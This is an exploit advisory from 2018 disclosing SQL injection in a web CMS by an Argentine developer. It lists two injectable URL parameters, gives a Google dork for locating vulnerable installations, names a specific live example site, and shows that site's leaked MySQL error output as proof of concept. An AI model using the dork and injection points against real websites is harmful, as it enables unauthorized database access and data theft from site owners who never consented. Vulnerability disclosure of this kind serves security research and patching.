#################################################################################################
# Exploit Title : Diseño y Desarrollo D&H Soluciones Argentina SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/09/2018
# Vendor Homepage : dyhsoluciones.com.ar
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork : intext:''Diseño y Desarrollo: D&H Soluciones''
# Exploit :
/productos-listado.php?_pagi_pg=[SQL Injection]
/producto.php?id=[SQL Injection]
#################################################################################################
# Example Site => mapaequipamientos.com.ar/productos-listado.php?_pagi_pg=357' => [ Proof of Concept ] => archive.is/ycpMz
# SQL Database Error =>
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/mapa/public_html/inc/productos-listado.php on line 63
Error en la consulta de conteo de registros: SELECT COUNT(*) FROM contenido_web inner join contenido_web_x_categorias on contenido_web.id =
contenido_web_x_categorias.idContenido where contenido_web_x_categorias.idCategorias = 38 order by contenido_web.fecha desc.
Mysql dijo: Table 'mapa_dyhcms.contenido_web' doesn't exist
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################